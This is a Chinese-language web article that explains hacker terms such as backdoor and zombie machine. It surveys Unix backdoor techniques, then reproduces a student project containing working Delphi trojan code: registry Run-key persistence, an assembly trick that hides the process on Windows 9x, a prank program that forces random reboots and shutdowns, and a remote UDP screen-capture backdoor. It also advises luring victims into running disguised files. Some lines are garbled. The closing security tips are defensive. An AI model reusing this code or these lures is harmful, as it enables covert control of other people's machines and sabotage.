黑客用语后门_黑客 术语

文章目录：

• 1、网络中后门是什么意思？
• 2、黑客们常说的“肉鸡”“后门” 都是什么意思
• 3、黑客后门是什么意思
• 4、网络上的后门是什么意思？
• 5、黑客中说的后门什么意思?
• 6、电脑网络中的“后门”是什么意思？

网络中后门是什么意思？

就是让攻击者可以在以后的日子里可以随时进行连接的东西，不一定是程序，可能会在你的系统里面留一个后门账户，可以随时进行远程桌面连接的后门账户。

网络中木马后门有:

系统木马、病毒。

2.WEB脚本木马:这些木马黑客俗称webshell。被入侵者利用，从而达到控制站服务器的目的。这些网页脚本常称为WEB脚本木马，目前比较流行的asp或php木马，也有基于.NET的脚本木马与JSP脚本木马。

3.shift后门:windows系统的一种后门。按五次shift即可出现的，可以执行dos命令甚至管理系统。

黑客们常说的“肉鸡”“后门” 都是什么意思

肉鸡也称傀儡机，是指可以被黑客远程控制的机器。比如用"灰鸽子"等诱导客户点击或者电脑被黑客攻破或用户电脑有漏洞被种植了木马，黑客可以随意操纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统，如windows、linux、unix等，更可以是一家公司、企业、学校甚至是政府军队的服务器。

所谓电脑肉鸡，就是拥有管理权限的远程电脑，也就是受黑客远程控制的电脑。

肉鸡不是吃的那种，是中了木马，或者留了后门，可以被远程控制的机器，许多人把有WEBSHELL权限的机器也叫肉鸡。

黑客后门是什么意思

后门程序就是留在计算机系统中，供某位特殊使用者通过某种特殊方式控制计算机系统的途径。[1]

后门程序，跟我们通常所说的"木马"有联系也有区别。联系在于：都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。区别在于：木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马（简称"木马"），其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。

后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。

后门是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。

而且,在病毒命名中，后门一般带有backdoor字样，而木马一般则是Trojan字样。

网络上的后门是什么意思？

网络上经常听到的后门就是这个意思，黑客通过特殊机能在服务器上开辟了一个网络服务，这个服务可以用来专门完成黑客的目的，那么服务器上就会被打开一个新的端口来完成这种服务，因为这个端口是供黑客使用的，因而轻易不会被一般上网用户和网络管理员发现，即隐藏的端口，故后门

黑客中说的后门什么意思?

一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。

密码破解后门

这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

Rhosts + + 后门

在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。入侵者只要向可以访问的某用户的rhosts文件中输入"+ +"，就可以允许任何人从任何地方无须口令便能进入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力。许多管理员经常检查 "+ +"，所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名，从而不易被发现。

校验和及时间戳后门

早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。

Login后门

在Unix里，login程序通常用来对telnet来的用户进行口令验证。 入侵者获取login.c的原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便用"strings"命令搜索login程序以寻找文本信息。 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效。 所以更多的管理员是用MD5校验和检测这种后门的。

Telnetd后门

当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端。典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产生一个shell。

服务后门

几乎所有网络服务曾被入侵者作过后门。 Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。

Cronjob后门

Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。

库后门

几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题： 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。

内核后门

内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别。一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。

文件系统后门

入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补"ls"，"du"，"fsck"以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞： 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些"坏扇区"里的文件系统，而它又确实存在。

Boot块后门

在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。

隐匿进程后门

入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序(sniffer)，有许多办法可以实现，这里是较通用的： 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此当管理员用"ps"检查运行进程时，出现 的是标准服务名。可以修改库函数致使"ps"不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

amod.tar.gz :

网络通行。这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问。 因为这是通过非标准网络端口的通行，管理员可能忽视入侵者的足迹。 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。

TCP Shell 后门

入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他们用口令进行保护以免管理员连接上后立即看到是shell访问。 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉。 通常这些后门可以让入侵者躲过TCP Wrapper技术。这些后门可以放在SMTP端口，许多防火墙允许 e-mail通行的.

UDP Shell 后门

管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。

ICMP Shell 后门

Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。

加密连接

管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

电脑网络中的“后门”是什么意思？

电脑网络中的“后门”即是网络的漏洞

一、问题的提出

"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是著名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来，网络给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随网络产生成长的，是指那些对电脑和网络有狂热兴趣的人，他们不断的研究电脑和网络知识，发现电脑和网络中的漏洞，喜欢挑战高难度的网络系统，千方百计的寻找网络中的大小漏洞，然后向网络管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑网络四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是网络上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。

现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触网络后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在网络机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计方法，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获网络上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统

一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西制作成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。

木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改方法一般是通过修改注册表：

Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和

Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

StdCtrls,registry;

type

TForm1 = class(TForm)

Button1: TButton;

Button2: TButton;

procedure Button1Click(Sender: TObject);

procedure Button2Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);

var

regf:tregistry;

sysdir:pchar;

temp:string;

begin

getmem(sysdir,256);

getsystemdirectory(sysdir,128);

temp:=sysdir+'\client.exe';

freemem(sysdir,256);

regf:=tregistry.create;

regf.rootkey:=hkey_local_machine;

regf.openkey('software\microsoft\windows\currentversion\run',true);

regf.writestring(' ',temp);

regf.free;

copyfile(pchar('hacker.exe'),pchar(temp),true);

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

close;

end;

end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。

在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：

asm

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。

下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;

uses

windows;

var temp:integer;

begin

asm

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

randomize;

temp:=random(3);

if temp=0 then

while(true) do

begin

messagebeep(0);

SetCursorPos (random(640),random(480));

end

else if temp=1 then

ExitWindowsEx(EWX_REBOOT,0)

else ExitWindowsEx(EWX_SHUTDOWN,0);

end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。

另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类

1、破坏型

惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。

2、密码发送型

可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。

在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。

3、远程访问型

最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。

程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：

让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

NMUDP, ComCtrls;

type

Tclient = class(TForm)

cudp: TNMUDP;

Animate1: TAnimate;

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure cudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

client: Tclient;

implementation

const bufsize=2048;//发送每一批数据的缓冲区大小

var

bmpstream:tmemorystream;

leftsize:longint;

{$R *.DFM}

procedure screencap(leftpos,toppos,rightpos,bottompos:integer);

var

recwidth,recheight:integer;

sourcedc,destdc,bhandle:integer;

bitmap:Tbitmap;

begin

recwidth:=rightpos-leftpos;

recheight:=bottompos-toppos;

sourcedc:=createdc('display','','',nil);

destdc:=createcompatibledc(sourcedc);

bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);

selectobject(destdc,bhandle);

bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,srccopy);

bitmap:=tbitmap.Create;

bitmap.Handle:=bhandle;

bitmap.SaveToStream(bmpstream);

bmpstream.Position:=0;

leftsize:=bmpstream.Size;

bitmap.Free;

deletedc(destdc);

releasedc(bhandle,sourcedc);

end;

procedure Tclient.FormCreate(Sender: TObject);

begin

bmpstream:=tmemorystream.create;

end;

procedure Tclient.FormDestroy(Sender: TObject);

begin

bmpstream.free;

end;

procedure Tclient.cudpDataReceived(Sender: TComponent;

NumberBytes: Integer; FromIP: String);

var

ctrlcode:array[0..29] of char;

buf:array[0..bufsize-1] of char;

tmpstr:string;

sendsize,leftpos,toppos,rightpos,bottompos:integer;

begin

cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码

if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'

then

begin//控制码前4位为"SHOW"表示主控机发出了截屏指令

if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据

begin tmpstr:=strpas(ctrlcode);

tmpstr:=copy(tmpstr,5,length(tmpstr)-4);

leftpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

toppos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

rightpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

bottompos:=strtoint(copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));

screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数

end;

if leftsizebufsize then sendsize:=bufsize

else sendsize:=leftsize;

bmpstream.ReadBuffer(buf,sendsize);

leftsize:=leftsize-sendsize;

if leftsize=0 then bmpstream.Clear;

cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址

cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口

end;

end;

end.

主控机程序部分：

让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

ExtCtrls, StdCtrls, Buttons, NMUDP;

type

Tsever = class(TForm)

Edit1: TEdit;

Edit2: TEdit;

Label1: TLabel;

Label2: TLabel;

BitBtn1: TBitBtn;

Image1: TImage;

BitBtn2: TBitBtn;

sudp: TNMUDP;

procedure BitBtn2Click(Sender: TObject);

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure BitBtn1Click(Sender: TObject);

procedure sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

sever: Tsever;

implementation

const bufsize=2048;

var

rsltstream,tmpstream:tmemorystream;

{$R *.DFM}

procedure Tsever.BitBtn2Click(Sender: TObject);

begin

close;

end;

procedure Tsever.FormCreate(Sender: TObject);

begin

rsltstream:=tmemorystream.create;

tmpstream:=tmemorystream.create;

end;

procedure Tsever.FormDestroy(Sender: TObject);

begin

rsltstream.free;

tmpstream.free;

end;

procedure Tsever.BitBtn1Click(Sender: TObject);

var

reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

tmpstream.Clear;

rsltstream.Clear;

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

procedure Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

var reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

sudp.ReadStream(tmpstream);

rsltstream.CopyFrom(tmpstream,numberbytes);

if numberbytesbufsize then

begin

rsltstream.Position:=0;

image1.Picture.Bitmap.LoadFromStream(rsltstream);

tmpstream.Clear;

rsltstream.Clear;

end

else

begin

tmpstream.Clear;

reqcode:='show';

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

end;

end.

四、如何预防黑客

黑客程序虽然破坏大，但不是不能防止的。

1、处理好你的密码

我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。

⑴ 密码不可和账号相同，这是最容易被猜到的了。

⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。

⑶ 密码最好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，最好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。

⑷ 有人喜欢用自己的生日、电话、身份证号码等作为密码，你不要这样做。

⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。

2、不要运行不明真相的程序

无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、著名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。

3、经常检查系统信息

上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。

4、最好不去聊天室

我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。